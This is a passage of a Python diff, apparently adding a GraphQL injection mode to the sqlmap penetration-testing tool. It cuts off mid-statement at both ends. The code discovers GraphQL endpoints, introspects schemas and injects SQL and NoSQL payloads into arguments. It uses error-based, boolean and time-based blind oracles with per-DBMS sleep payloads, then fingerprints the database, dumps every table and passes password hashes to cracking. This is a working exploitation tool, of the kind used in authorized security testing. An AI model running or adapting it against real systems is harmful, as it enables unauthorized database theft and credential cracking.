"ASCII(SUBSTRING((%s),%d,1))" % (expr, pos), + delay=None, + banner="@@VERSION", + currentUser="SYSTEM_USER", + currentDb="DB_NAME()", + tables="(SELECT STRING_AGG(name,',') FROM sys.tables)", + columns=lambda table: "(SELECT STRING_AGG(name,',') FROM sys.columns WHERE object_id=OBJECT_ID('%s'))" % table, + rows=_mssqlRows)), + ("PostgreSQL", Dialect( + fingerprint="(SELECT version()) LIKE 'PostgreSQL%'", + length=lambda expr: "LENGTH((%s))" % expr, + ordinal=lambda expr, pos: "ASCII(SUBSTRING((%s),%d,1))" % (expr, pos), + delay=lambda cond, secs: "(CASE WHEN (%s) THEN (SELECT 1 FROM pg_sleep(%d)) ELSE 0 END)" % (cond, secs), + banner="version()", + currentUser="CURRENT_USER", + currentDb="CURRENT_DATABASE()", + tables="(SELECT STRING_AGG(table_name,',') FROM information_schema.tables WHERE table_schema='public')", + columns=lambda table: "(SELECT STRING_AGG(column_name,',') FROM information_schema.columns WHERE table_name='%s')" % table, + rows=_pgsqlRows)), + ("MySQL", Dialect( + fingerprint="@@VERSION_COMMENT IS NOT NULL", + length=lambda expr: "CHAR_LENGTH((%s))" % expr, + ordinal=lambda expr, pos: "ASCII(SUBSTRING((%s),%d,1))" % (expr, pos), + delay=lambda cond, secs: "IF((%s),SLEEP(%d),0)" % (cond, secs), + banner="VERSION()", + currentUser="CURRENT_USER()", + currentDb="DATABASE()", + tables="(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())", + columns=lambda table: "(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='%s')" % table, + rows=_mysqlRows)), +)) + + +# --- Slot model ------------------------------------------------------------- + +# Carries everything needed to build a valid GraphQL document for one argument +# injection point: the root operation (query/mutation), the full field argument +# list (so required siblings can be defaulted), the target argument name, the +# injection strategy, and return-type metadata for a correct selection set. +Slot = namedtuple("Slot", ("operation", "parentType", "fieldName", "allArgs", + "targetArg", "strategy", "returnKind", "returnType", + "returnSel")) + + +# --- Helpers ---------------------------------------------------------------- + +def _ratio(first, second): + return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio() + + +def _chunks(sequence, size): + # Yield successive `size`-length chunks of `sequence` + for index in xrange(0, len(sequence), size): + yield sequence[index:index + size] + + +def _unwrapType(typeObj, depth=0): + # Traverse a GraphQL type chain, returning [(kind, name), ...] from outermost + # to innermost. NON_NULL and LIST wrappers are unwrapped transparently; named + # types terminate the chain. + if depth > 8 or not isinstance(typeObj, dict): + return [] + kind = typeObj.get("kind", "") + name = typeObj.get("name") + ofType = typeObj.get("ofType") + if ofType and kind in ("NON_NULL", "LIST"): + return [(kind, name)] + _unwrapType(ofType, depth + 1) + return [(kind, name)] + + +def _leafName(chain): + # Last named type in the unwrapped chain (strips NON_NULL / LIST wrappers) + for kind, name in reversed(chain): + if name: + return name + return None + + +def _classifyArg(argType): + # Map a GraphQL argument type to a strategy key, or None for skipped types + chain = _unwrapType(argType) + named = next((name for kind, name in reversed(chain) if name), None) + return SCALAR_STRATEGY.get(named) + + +def _escapeGraphQLString(value): + # Escape a string for embedding inside a double-quoted GraphQL string literal + return getUnicode(value).replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n") + + +def _cell(value): + # Render a parsed JSON value as a single dump cell: NULL for null, compact JSON + # for nested objects/arrays (never the Python repr), and the plain text otherwise + if value is None: + return "NULL" + if isinstance(value, (dict, list)): + return json.dumps(value, sort_keys=True) + return "%s" % (value,) + + +# --- HTTP transport --------------------------------------------------------- + +def _gqlSend(endpoint, query, variables=None): + # POST a JSON GraphQL request to `endpoint`, returning (body, http_code) + body = {"query": query} + if variables: + body["variables"] = variables + oldPostHint = getattr(kb, "postHint", None) + try: + kb.postHint = POST_HINT.JSON + page, _, code = Request.getPage(url=endpoint, post=json.dumps(body), + raise404=False, silent=True) + except Exception: + return "", 0 + finally: + kb.postHint = oldPostHint + return page or "", code + + +def _parseJSON(page): + if not page: + return None + try: + return json.loads(page) + except (ValueError, TypeError): + return None + + +def _isGraphQLResponse(page): + # Does `page` look like a GraphQL JSON response envelope? Requires either + # __typename data or GraphQL-specific error phrasing to avoid false positives + # on ordinary JSON APIs. + doc = _parseJSON(page) + if not isinstance(doc, dict): + return False + data = doc.get("data") + if isinstance(data, dict) and data.get("__typename"): + return True + errors = doc.get("errors") + if isinstance(errors, list) and errors: + return bool(re.search(GRAPHQL_ERROR_REGEX, json.dumps(errors))) + return False + + +def _errorText(page): + # Extract a concatenated error-message string from a GraphQL error envelope + doc = _parseJSON(page) + if not isinstance(doc, dict): + return "" + errors = doc.get("errors") or [] + parts = [] + for e in errors: + if isinstance(e, dict): + parts.append(getUnicode(e.get("message", ""))) + ext = e.get("extensions") + if isinstance(ext, dict): + parts.append(getUnicode(ext.get("code", ""))) + exception = ext.get("exception") + if isinstance(exception, (str, bytes)): + parts.append(getUnicode(exception)) + return "\n".join(p for p in parts if p) + + +def _slotValue(page): + # Extract the first `data` subtree for boolean comparison - we compare the + # resolved field content, not the whole GraphQL envelope. + doc = _parseJSON(page) + if not isinstance(doc, dict): + return page + data = doc.get("data") + if isinstance(data, dict): + for v in data.values(): + if v is not None: + return json.dumps(v, sort_keys=True) + return json.dumps(data, sort_keys=True) + + +# --- Endpoint detection ----------------------------------------------------- + +def _detectEndpoint(baseUrl, probePaths=True): + # Identify the GraphQL endpoint URL. If `baseUrl` already points at a path + # that responds as GraphQL, return it directly. Otherwise probe common paths. + + page, code = _gqlSend(baseUrl, "{__typename}") + if _isGraphQLResponse(page): + return baseUrl, page + + if not probePaths: + return None, None + + for path in GRAPHQL_ENDPOINT_PATHS: + candidate = baseUrl.rstrip("/") + path + page, code = _gqlSend(candidate, "{__typename}") + if _isGraphQLResponse(page): + return candidate, page + + return None, None + + +# --- Schema introspection --------------------------------------------------- + +def _introspect(endpoint): + # Send the standard introspection query and return the parsed __schema dict. + # Falls back to a query without `specifiedByURL` for older GraphQL servers + # that reject it. + + for query in (GRAPHQL_INTROSPECTION_QUERY, + GRAPHQL_INTROSPECTION_QUERY.replace('specifiedByURL\n', '')): + page, code = _gqlSend(endpoint, query) + doc = _parseJSON(page) + if not isinstance(doc, dict): + continue + data = doc.get("data") + if isinstance(data, dict) and "__schema" in data: + return data["__schema"] + return None + + +# --- Schema walking --------------------------------------------------------- + +def _extractSlots(schema): + # Walk the schema's Query and Mutation types, harvesting every + # scalar/injectable argument as a Slot + + _inputFields.clear() + + slots = [] + typeByName = {} + for t in (schema.get("types") or []): + if isinstance(t, dict) and t.get("name"): + typeByName[t["name"]] = t + if t.get("kind") == "INPUT_OBJECT": + _inputFields[t["name"]] = [ + (f["name"], f.get("type", {}), f.get("defaultValue")) + for f in (t.get("inputFields") or []) + ] + + queryName = (schema.get("queryType") or {}).get("name") + mutationName = (schema.get("mutationType") or {}).get("name") + + for op, rootName in (("query", queryName), ("mutation", mutationName)): + if not rootName: + continue + rootType = typeByName.get(rootName) + if not rootType or rootType.get("kind") != "OBJECT": + continue + for field in (rootType.get("fields") or []): + fieldName = field["name"] + fieldArgs = field.get("args") or [] + + # Resolve return-type kind and the leaf selection set + returnChain = _unwrapType(field.get("type", {})) + returnKind = "SCALAR" + returnTypeName = _leafName(returnChain) + for kind, name in returnChain: + if kind != "NON_NULL": + returnKind = kind + + returnObj = typeByName.get(returnTypeName) if returnTypeName else None + leafFields = _scalarFields(returnObj, typeByName) + + # Nested object selections (one level) + nested = {} + if returnObj and returnObj.get("kind") == "OBJECT": + for rf in (returnObj.get("fields") or []): + rfChain = _unwrapType(rf.get("type", {})) + rfName = _leafName(rfChain) + rfObj = typeByName.get(rfName) if rfName else None + if rfObj and rfObj.get("kind") == "OBJECT": + nested[rf["name"]] = _scalarFields(rfObj, typeByName) or ["__typename"] + + returnSel = _renderSelection(returnKind, returnTypeName, leafFields, nested) + + for arg in (fieldArgs or []): + allArgs = [(a["name"], a.get("type", {}), a.get("defaultValue")) for a in fieldArgs] + strategy = _classifyArg(arg.get("type", {})) + if strategy: + slots.append(Slot(op, rootName, fieldName, allArgs, + arg["name"], strategy, returnKind, + returnTypeName, returnSel)) + elif _isInputObject(arg.get("type", {}), typeByName): + _inputSlots(op, rootName, fieldName, allArgs, + arg["name"], arg.get("type", {}), + returnKind, returnTypeName, returnSel, typeByName, slots) + return slots + + +def _isInputObject(typeObj, typeByName): + name = _leafName(_unwrapType(typeObj)) + if not name: + return None + t = typeByName.get(name) + return t if t and t.get("kind") == "INPUT_OBJECT" else None + + +def _inputSlots(op, rootName, fieldName, allArgs, argName, typeObj, + returnKind, returnType, returnSel, typeByName, slots): + # Recurse one level into an input object's fields + inputType = _isInputObject(typeObj, typeByName) + if not inputType: + return + for fld in (inputType.get("inputFields") or []): + strategy = _classifyArg(fld.get("type", {})) + if strategy: + slots.append(Slot(op, rootName, fieldName, allArgs, + "%s.%s" % (argName, fld["name"]), strategy, + returnKind, returnType, returnSel)) + + +def _scalarFields(objType, typeByName, depth=0): + # Return scalar/leaf field names reachable from `objType` (for selection set) + if not objType or depth > 3: + return [] + names = [] + for fld in (objType.get("fields") or []): + fType = typeByName.get(_leafName(_unwrapType(fld.get("type", {})))) + if not fType or fType.get("kind") in ("SCALAR", "ENUM"): + names.append(fld["name"]) + return names + + +def _renderSelection(returnKind, returnType, leafFields, nested): + # Build the return selection part of a GraphQL document string. + # Scalars/enums: no sub-selection (None). Objects/Lists-of-objects: + # nested field set. Lists-of-scalars also get no sub-selection. + if returnKind in ("SCALAR", "ENUM"): + return None + leafPart = " ".join(leafFields) if leafFields else "__typename" + nestedPart = "" + for objField, subFields in (nested or {}).items(): + nestedPart += " %s { %s }" % (objField, " ".join(subFields)) + return "{ %s%s }" % (leafPart, nestedPart) + + +# --- Request construction --------------------------------------------------- + +def _fieldFragment(slot, value, alias=None): + # Render a single `alias:field(args) selection` fragment with `value` in the + # target argument. Required sibling arguments get safe defaults. Returns "" when + # the value cannot be embedded (e.g. a non-numeric payload in an Int literal). + + if slot.strategy == "numeric" and not getUnicode(value).lstrip("-").isdigit(): + return "" + + renderedArgs = [] + for argName, argType, default in slot.allArgs: + if argName == slot.targetArg or slot.targetArg.startswith(argName + "."): + if "." in slot.targetArg: + outer, inner = slot.targetArg.split(".", 1) + if argName == outer: + renderedArgs.append("%s: {%s}" % (outer, _renderInputObj(slot, value))) + continue + renderedArgs.append(_renderArg(argName, value, slot.strategy)) + else: + siblingStrategy = _classifyArg(argType) or "string" + renderedArgs.append(_renderArg(argName, _defaultForArg(argType, default), siblingStrategy)) + + sel = slot.returnSel + if sel is None: + sel = "" + elif not sel: + sel = "{ __typename }" + argsPart = "(%s)" % ", ".join(renderedArgs) if renderedArgs else "" + return "%s:%s%s %s" % (alias or slot.fieldName, slot.fieldName, argsPart, sel) + + +def _buildQuery(slot, value): + # Render a complete single-field GraphQL document with `value` in the target + # argument. Wraps as a mutation when the slot belongs to the mutation root. + fragment = _fieldFragment(slot, value) + if not fragment: + return "" + prefix = "mutation " if slot.operation == "mutation" else "" + return "%s{%s}" % (prefix, fragment) + + +def _buildBatch(slot, values): + # Render one GraphQL document aliasing the field once per value (a0, a1, ...), + # so many independent injections resolve in a single request. Returns + # (document, aliases) or ("", []) when any value cannot be embedded. + fragments, aliases = [], [] + for index, value in enumerate(values): + alias = "a%d" % index + fragment = _fieldFragment(slot, value, alias) + if not fragment: + return "", [] + fragments.append(fragment) + aliases.append(alias) + prefix = "mutation " if slot.operation == "mutation" else "" + return "%s{%s}" % (prefix, " ".join(fragments)), aliases + + +def _renderArg(name, value, strategy): + # Render a single argument: name:"value" (string) or name:value (numeric) + if strategy == "numeric": + return "%s:%s" % (name, value) + if strategy == "id_dual" and isinstance(value, (str, bytes)) and getUnicode(value).lstrip("-").isdigit(): + return "%s:%s" % (name, value) + return '%s:"%s"' % (name, _escapeGraphQLString(value)) + + +def _renderInputObj(slot, value): + # Render an input-object literal with the target inner field set to `value` + # and all required sibling fields filled with safe defaults + _, inner = slot.targetArg.split(".", 1) + + outerArg = slot.targetArg.split(".")[0] + inputFields = [] + for aName, aType, aDefault in slot.allArgs: + if aName == outerArg: + objName = _leafName(_unwrapType(aType)) + if objName: + inputFields = _inputFields.get(objName, []) + break + + parts = [] + for fldName, fldType, fldDefault in inputFields: + if fldName == inner: + fldStrategy = _classifyArg(fldType) or "string" + parts.append(_renderArg(inner, value, fldStrategy)) + else: + fldStrategy = _classifyArg(fldType) or "string" + parts.append(_renderArg(fldName, _defaultForArg(fldType, fldDefault), fldStrategy)) + return ", ".join(parts) + + +def _defaultForArg(argType, default): + # Return a safe GraphQL default value for a field argument: the schema + # default if present, otherwise a type-appropriate sentinel + if default is not None: + return default + strategy = _classifyArg(argType) + if strategy == "numeric": + return 0 + return "x" + + +# --- Detection -------------------------------------------------------------- + +def _detectError(slot, endpoint): + # Error-based detection: inject SQL/NoSQL error-inducing payloads and check + # whether the GraphQL `errors` envelope carries a known DBMS signature + + for payload in _SQL_ERROR_PAYLOADS: + query = _buildQuery(slot, payload) + if not query: + continue + page, code = _gqlSend(endpoint, query) + err = _errorText(page) + if not err: + continue + for pattern in ERROR_PARSING_REGEXES: + m = re.search(pattern, err) + if m: + return "error-based", m.group("result") if "result" in m.groupdict() else err[:200] + + # Try NoSQL error signatures + for payload in (_NOSQL_NE, _NOSQL_IN): + query = _buildQuery(slot, payload) + if not query: + continue + page, code = _gqlSend(endpoint, query) + err = _errorText(page) + if err and re.search(NOSQL_ERROR_REGEX, err): + return "error-based", err[:200] + + return None, None + + +def _detectBoolean(slot, endpoint): + # Boolean-based detection: compare the resolved data between true and false + # payloads. Numeric GraphQL literals (Int/Float) cannot carry SQL payloads. + + if slot.strategy == "numeric": + return None, None + + trueQuery = _buildQuery(slot, _SQL_BOOLEAN_TRUE) + falseQuery = _buildQuery(slot, _SQL_BOOLEAN_FALSE) + + if not trueQuery or not falseQuery: + return None, None + + truePage, _ = _gqlSend(endpoint, trueQuery) + falsePage, _ = _gqlSend(endpoint, falseQuery) + + trueVal = _slotValue(truePage) + falseVal = _slotValue(falsePage) + + if _ratio(trueVal, falseVal) < (1.0 - _MIN_RATIO_DIFF): + return "boolean-based blind (string)", truePage + + return None, None + + +def _detectTime(slot, endpoint): + # Time-based detection: send a per-dialect conditional sleep and measure the + # elapsed time against a baseline. Returns (oracleType, threshold, dbms). + + if slot.strategy == "numeric": + return None, None, None + + baseQuery = _buildQuery(slot, "x") + if not baseQuery: + return None, None, None + + start = time.time() + _gqlSend(endpoint, baseQuery) + baseline = time.time() - start + + delay = conf.timeSec + for dbms, dialect in DIALECTS.items(): + if not dialect.delay: + continue + query = _buildQuery(slot, "%s' OR %s-- " % (SENTINEL, dialect.delay("1=1", delay))) + if not query: + continue + start = time.time() + _gqlSend(endpoint, query) + if (time.time() - start) > baseline + delay * 0.5: + return "time-based blind", baseline + delay * 0.5, dbms + + return None, None, None + + +# --- Boolean / time oracle (universal blind-SQLi primitive) ----------------- + +def _makeOracle(slot, endpoint, dbmsHint=None, threshold=None): + """Establish a truth(sqlCondition) -> bool primitive on `slot`. For a content + oracle the condition is injected as `' OR ()-- ` and the resolved + field is compared to its always-true template; for a timing oracle the condition + is wrapped in the dialect's conditional sleep. Returns (truth, truthBatch) where + truthBatch(conditions) -> [bool] evaluates many conditions in one aliased request + (None when the back-end rejects batching). Returns (None, None) when no usable + contrast exists on this slot.""" + + def _payload(condition): + return "%s' OR (%s)-- " % (SENTINEL, condition) + + if threshold is not None and dbmsHint and DIALECTS[dbmsHint].delay: + # Timing oracle: a per-document sleep fires only when `condition` holds. Batching + # would serialise the sleeps and inflate every request, so it is not offered here. + delay = DIALECTS[dbmsHint].delay + + def truth(condition): + query = _buildQuery(slot, "%s' OR %s-- " % (SENTINEL, delay(condition, conf.timeSec))) + if not query: + return False + start = time.time() + _gqlSend(endpoint, query) + return (time.time() - start) > threshold + + return truth, None + + # Content oracle: capture the always-true template and require a clear true/false split + trueVal = _slotValue(_gqlSend(endpoint, _buildQuery(slot, _payload("1=1")))[0]) + falseVal = _slotValue(_gqlSend(endpoint, _buildQuery(slot, _payload("1=2")))[0]) + if _ratio(trueVal, falseVal) > UPPER_RATIO_BOUND: + return None, None + + def truth(condition): + query = _buildQuery(slot, _payload(condition)) + if not query: + return False + page, _ = _gqlSend(endpoint, query) + return _ratio(_slotValue(page), trueVal) > UPPER_RATIO_BOUND + + def truthBatch(conditions): + query, aliases = _buildBatch(slot, [_payload(_) for _ in conditions]) + if not query: + return [False] * len(conditions) + page, _ = _gqlSend(endpoint, query) + data = (_parseJSON(page) or {}).get("data") or {} + return [_ratio(json.dumps(data.get(alias), sort_keys=True, default=str), trueVal) > UPPER_RATIO_BOUND + for alias in aliases] + + # Sanity: the oracle must answer a known truth/falsehood correctly + if not (truth("1=1") and not truth("1=2")): + return None, None + + return truth, truthBatch + + +def _fingerprint(truth): + # Identify the back-end DBMS by probing each dialect's signature predicate + for dbms, dialect in DIALECTS.items(): + if truth(dialect.fingerprint): + return dbms + return None + + +# --- Blind inference -------------------------------------------------------- + +def _inferExpr(truth, dialect, expr, maxLen=MAX_LENGTH): + # Recover the string value of SQL expression `expr` one character at a time: + # binary-search the length, then bisect each character's codepoint over the + # printable-ASCII range (~log2(95) requests per character). + lengthExpr = dialect.length(expr) + + if not truth("%s>0" % lengthExpr): + return "" if truth("%s=0" % lengthExpr) else None + + length, probe = 1, 2 + while probe <= maxLen and truth("%s>=%d" % (lengthExpr, probe)): + length, probe = probe, probe * 2 + low, high = length, min(probe, maxLen + 1) + while low + 1 < high: + mid = (low + high) // 2 + if truth("%s>=%d" % (lengthExpr, mid)): + low = mid + else: + high = mid + length = low + + value = "" + for pos in xrange(1, length + 1): + ordExpr = dialect.ordinal(expr, pos) + if not truth("%s>=%d" % (ordExpr, CHAR_MIN)): + value += "?" # codepoint outside the printable-ASCII range + continue + low, high = CHAR_MIN, CHAR_MAX + while low < high: + mid = (low + high + 1) // 2 + if truth("%s>=%d" % (ordExpr, mid)): + low = mid + else: + high = mid - 1 + value += chr(low) + return value + + +def _inferExprBatched(truthBatch, dialect, expr, maxLen=MAX_LENGTH): + # Same recovery as _inferExpr, but every probe is independent and resolved in + # parallel via aliased batching: the length is read from monotone >=N predicates + # and each character from its 7 independent bit predicates (ASCII & 2**b). An + # L-character value costs ceil(7*L / BATCH_SIZE) requests instead of ~7*L. + lengthExpr = dialect.length(expr) + + length = 0 + for chunk in _chunks(list(xrange(1, maxLen + 1)), BATCH_SIZE): + results = truthBatch(["%s>=%d" % (lengthExpr, _) for _ in chunk]) + hits = [n for n, ok in zip(chunk, results) if ok] + if hits: + length = max(length, max(hits)) + if not all(results): # monotone predicate: no longer length can be true beyond here + break + if length == 0: + return "" + + conditions, index = [], [] + for pos in xrange(1, length + 1): + for bit in xrange(7): + conditions.append("(%s & %d)>0" % (dialect.ordinal(expr, pos), 1 << bit)) + index.append((pos, bit)) + + codes = {} + flat = [] + for chunk in _chunks(conditions, BATCH_SIZE): + flat.extend(truthBatch(chunk)) + for (pos, bit), ok in zip(index, flat): + if ok: + codes[pos] = codes.get(pos, 0) | (1 << bit) + + value = "" + for pos in xrange(1, length + 1): + code = codes.get(pos, 0) + value += chr(code) if CHAR_MIN <= code <= CHAR_MAX else "?" + return value + + +def _inferrer(truth, truthBatch, dialect): + # Pick batched inference when the back-end honours aliased batching (verified + # with a known true/false pair), else fall back to sequential bisection + if truthBatch and truthBatch(["1=1", "1=2"]) == [True, False]: + logger.info("using aliased query batching to accelerate blind extraction") + return lambda expr, maxLen=MAX_LENGTH: _inferExprBatched(truthBatch, dialect, expr, maxLen) + return lambda expr, maxLen=MAX_LENGTH: _inferExpr(truth, dialect, expr, maxLen) + + +def _dumpTable(infer, dialect, table): + # Enumerate a table's columns, then recover every row as one concatenated scalar + # and split it back into a (columns, rows) grid + columnsRaw = infer(dialect.columns(table)) + columns = [_ for _ in (columnsRaw or "").split(",") if _] + if not columns: + return None + + raw = infer(dialect.rows(columns, table), DUMP_MAX_LENGTH) + rows = [] + for record in (raw or "").split(ROW_SEP) if raw else []: + cells = record.split(COL_SEP) + rows.append((cells + [""] * len(columns))[:len(columns)]) + return columns, rows + + +# --- Dump ------------------------------------------------------------------- + +def _dumpInband(endpoint, slot, templatePage): + # Check whether the always-true response carries materially more data than + # the original (in-band data exposure) + origQuery = _buildQuery(slot, "x") + if not origQuery: + return None + origPage, _ = _gqlSend(endpoint, origQuery) + if len(templatePage or "") < len(origPage or "") * 1.25: + return None + return _parseRows(templatePage, slot) + + +def _parseRows(page, slot): + # Parse a GraphQL JSON `data` tree into (columns, rows) + doc = _parseJSON(page) + if not isinstance(doc, dict): + return None + data = doc.get("data") + if not isinstance(data, dict): + return None + for v in data.values(): + if v is None: + return None + if isinstance(v, list): + columns = [] + for item in v: + if isinstance(item, dict): + for k in item: + if k not in columns: + columns.append(k) + rows = [] + for item in v: + if isinstance(item, dict): + rows.append([_cell(item.get(c)) for c in columns]) + return (columns, rows) if rows else None + if isinstance(v, dict): + columns = sorted(v.keys()) + rows = [[_cell(v.get(c)) for c in columns]] + return (columns, rows) + return None + + +def _grid(columns, rows): + # Render a simple ASCII table + if not columns or not rows: + return "(empty)" + widths = [] + for i, c in enumerate(columns): + w = len("%s" % (c,)) + for r in rows: + w = max(w, len("%s" % (r[i] if i < len(r) else "",))) + widths.append(w) + sep = "+-" + "-+-".join("-" * w for w in widths) + "-+" + header = "| " + " | ".join(("%s" % (c,)).ljust(w) for c, w in zip(columns, widths)) + " |" + lines = [sep, header, sep] + for row in rows: + lines.append("| " + " | ".join(("%s" % (row[i] if i < len(row) else "",)).ljust(w) + for i, w in enumerate(widths)) + " |") + lines.append(sep) + return "\n".join(lines) + + +def _renderTypeStr(chain): + # Render a GraphQL type chain as a readable string: [User]! or String! + named = _leafName(chain) or "" + prefix = "" + suffix = "" + for kind, _ in chain: + if kind == "NON_NULL": + suffix = "!" + elif kind == "LIST": + prefix = "[" + prefix + suffix = suffix + "]" + return prefix + named + suffix + + +def _dumpSchema(schema, endpoint): + # Dump the schema as readable tables: types and their fields/arguments + if not schema: + return + + types = schema.get("types") or [] + queryName = (schema.get("queryType") or {}).get("name") + mutationName = (schema.get("mutationType") or {}).get("name") + + rows = [] + for t in types: + if not isinstance(t, dict): + continue + kind = t.get("kind", "") + name = t.get("name", "") + if kind not in ("OBJECT", "INPUT_OBJECT"): + continue + rootTag = "" + if name == queryName: + rootTag = " [Query]" + elif name == mutationName: + rootTag = " [Mutation]" + fields = t.get("fields") or t.get("inputFields") or [] + if not fields: + rows.append([kind, name + rootTag, "", "", "", ""]) + for f in fields: + fName = f.get("name", "") + typeStr = _renderTypeStr(_unwrapType(f.get("type", {}))) + for a in (f.get("args") or []): + aType = _renderTypeStr(_unwrapType(a.get("type", {}))) + strategy = _classifyArg(a.get("type", {})) or "" + rows.append([kind, name + rootTag, fName, typeStr, a["name"], aType, strategy]) + if not (f.get("args") or []): + rows.append([kind, name + rootTag, fName, typeStr, "", "", ""]) + + if rows: + conf.dumper.singleString("GraphQL schema (%s):\n%s" % (endpoint, + _grid(["Kind", "Type", "Field", "Return", "Argument", "ArgType", "Strategy"], rows))) + + +# --- Orchestration ---------------------------------------------------------- + +def _testSlot(slot, endpoint): + """Confirm an injection on `slot` and report it. Returns (oracleType, oracle, detail) + where `oracle` is (truth, truthBatch, dbmsHint) for a usable blind-SQLi primitive (None for an + error-only / non-differential point) and `oracleType` is None when nothing is confirmed.""" + + kind = oracleType = detail = templatePage = dbmsHint = threshold = None + + # Boolean content inference is the most reliable extraction oracle, so it is preferred over the + # (also valid) error and time signals, which serve as fallbacks for non-differential slots. + oracleType, templatePage = _detectBoolean(slot, endpoint) + if oracleType: + kind = "boolean" + logger.info("boolean-based oracle confirmed (%s)" % oracleType) + else: + errorType, detail = _detectError(slot, endpoint) + if errorType: + kind, oracleType = "error", errorType + logger.info("error-based oracle confirmed") + else: + oracleType, threshold, dbmsHint = _detectTime(slot, endpoint) + if oracleType: + kind = "time" + logger.info("time-based oracle confirmed (back-end '%s', threshold %.1fs)" % (dbmsHint, threshold)) + + if not kind: + logger.info("no oracle confirmed for this slot") + return None, None, None + + title = "GraphQL %s" % oracleType + payload = _buildQuery(slot, _SQL_BOOLEAN_TRUE) or _SQL_BOOLEAN_TRUE + report = "---\nParameter: %s.%s(%s:) (%s)\n Type: GraphQL injection\n Title: %s\n Payload: %s\n---" % ( + slot.parentType, slot.fieldName, slot.targetArg, slot.strategy, title, _escapeGraphQLString(payload)) + conf.dumper.singleString(report) + + # In-band exposure: the always-true payload reflecting extra records directly + if kind == "boolean" and templatePage: + rows = _dumpInband(endpoint, slot, templatePage) + if rows: + columns, dataRows = rows + logger.info("in-band data exposure: %d record(s)" % len(dataRows)) + conf.dumper.singleString("GraphQL in-band data for %s.%s(%s:):\n%s" % ( + slot.parentType, slot.fieldName, slot.targetArg, _grid(columns, dataRows))) + + if kind in ("boolean", "time"): + truth, truthBatch = _makeOracle(slot, endpoint, dbmsHint, threshold) + if truth: + return oracleType, (truth, truthBatch, dbmsHint), detail + + return oracleType, None, detail + + +def _enumerate(oracle): + """Drive the blind-SQLi oracle to fingerprint the back-end and enumerate it: + banner, current user/database, the table list, and a full blind dump of every + user table. All of this is recovered without knowing any SQL identifier up front.""" + + truth, truthBatch, dbmsHint = oracle + + dbms = dbmsHint or _fingerprint(truth) + if not dbms: + logger.warning("could not fingerprint the back-end DBMS through the GraphQL oracle") + return + + dialect = DIALECTS[dbms] + logger.info("back-end DBMS: '%s'" % dbms) + conf.dumper.singleString("GraphQL back-end DBMS: %s" % dbms) + + infer = _inferrer(truth, truthBatch, dialect) + + for label, expr in (("banner", dialect.banner), + ("current user", dialect.currentUser), + ("current database", dialect.currentDb)): + if not expr: + continue + value = infer(expr) + if value: + logger.info("%s: '%s'" % (label, value)) + conf.dumper.singleString("GraphQL %s: %s" % (label, value)) + + tablesRaw = infer(dialect.tables) if dialect.tables else None + tables = [_ for _ in (tablesRaw or "").split(",") if _] + if not tables: + logger.warning("no tables recovered through the oracle") + return + + logger.info("fetching tables") + conf.dumper.singleString("GraphQL database tables [%d]:\n%s" % ( + len(tables), _grid(["table"], [[_] for _ in tables]))) + + for table in tables: + parsed = _dumpTable(infer, dialect, table) + if not parsed: + continue + columns, rows = parsed + logger.info("fetched %d entr%s from table '%s'" % (len(rows), "y" if len(rows) == 1 else "ies", table)) + + # Populate kb.data.dumpedTable and feed it through the standard + # password-hash analysis (hash-recognition + optional dictionary-crack) + # BEFORE displaying the dump, so that cracked passwords appear inline + # next to their hashes (matching the regular SQL table-dump workflow) + if len(rows) > 0 and not conf.disableHashing: + oldDumpedTable = getattr(kb.data, "dumpedTable", None) + try: + from lib.utils.hash import attackDumpedTable + kb.data.dumpedTable = {"__infos__": {"count": len(rows)}} + for ci, col in enumerate(columns): + kb.data.dumpedTable[col] = {"values": [row[ci] if ci < len(row) else "" for row in rows]} + attackDumpedTable() + # Re-read the rows: attackDumpedTable() may have appended + # cracked passwords in-place (e.g. "hash (password)") + for ci, col in enumerate(columns): + if col in kb.data.dumpedTable: + vals = kb.data.dumpedTable[col].get("values", []) + for ri in xrange(min(len(rows), len(vals))): + if ci < len(rows[ri]): + rows[ri][ci] = vals[ri] + except Exception: + pass + finally: + kb.data.dumpedTable = oldDumpedTable + + conf.dumper.singleString("GraphQL dump of table '%s' [%d]:\n%s" % ( + table, len(rows), _grid(columns, rows))) + + +def graphqlScan(): + # Entry point for '--graphql': detect the GraphQL endpoint, introspect the + # schema, enumerate injectable argument slots, confirm an injection oracle on a + # query slot, then fingerprint and blind-enumerate the SQL back-end through it + # (banner, tables, full table dumps). Mutation slots are reported but not + # exercised, to avoid modifying server-side data. + + global SENTINEL + SENTINEL = randomStr(length=10, lowercase=True) + + infoMsg = "'--graphql' is self-contained: it discovers the GraphQL endpoint, " + infoMsg += "enumerates the schema, and injects SQL/NoSQL payloads into reachable " + infoMsg += "argument slots. SQL enumeration switches (e.g. --banner, --dbs, " + infoMsg += "--tables) are ignored" + logger.info(infoMsg) + + url = conf.url.rstrip("/") if conf.url else "" + + if not url: + logger.error("missing target URL") + return + + # 1. Endpoint detection + logger.info("probing for a GraphQL endpoint") + + # If the user supplied a URL that already contains '/graphql/' (e.g. + # .../graphql/get_int?id=1, the broker probe URL), extract the base so + # that probe paths are not appended to a non-GraphQL sub-path + _m = re.match(r"(https?://[^/]+(?:/[^/]+)*?/graphql)(?:/.*)?$", url.rstrip("/")) + if _m: + url = _m.group(1) + + endpoint, _ = _detectEndpoint(url) + if not endpoint: + logger.error("no GraphQL endpoint found at '%s' (tried %d common paths)" % ( + url, len(GRAPHQL_ENDPOINT_PATHS) + 1)) + return + + logger.info("found GraphQL endpoint at '%s'" % endpoint) + + # 2. Schema introspection + logger.info("introspecting the GraphQL schema") + schema = _introspect(endpoint) + if not schema: + logger.error("introspection failed (disabled or the endpoint rejected the query)") + return + + types = schema.get("types") or [] + logger.info("introspection returned %d types" % len(types)) + + # 3. Slot enumeration + slots = _extractSlots(schema) + if not slots: + logger.warning("no injectable argument slots found in the schema") + _dumpSchema(schema, endpoint) + return + + querySlots = [_ for _ in slots if _.operation == "query"] + mutationSlots = [_ for _ in slots if _.operation == "mutation"] + + logger.info("enumerated %d injectable argument slot(s): %d query, %d mutation" % ( + len(slots), len(querySlots), len(mutationSlots))) + + # 4. Schema dump (before detection -- matches regular sqlmap table/column + # enumeration preceding data retrieval) + _dumpSchema(schema, endpoint) + + if mutationSlots: + names = sorted(set("%s(%s:)" % (_.fieldName, _.targetArg) for _ in mutationSlots)) + warnMsg = "skipping %d mutation slot(s) to avoid modifying server-side data " % len(mutationSlots) + 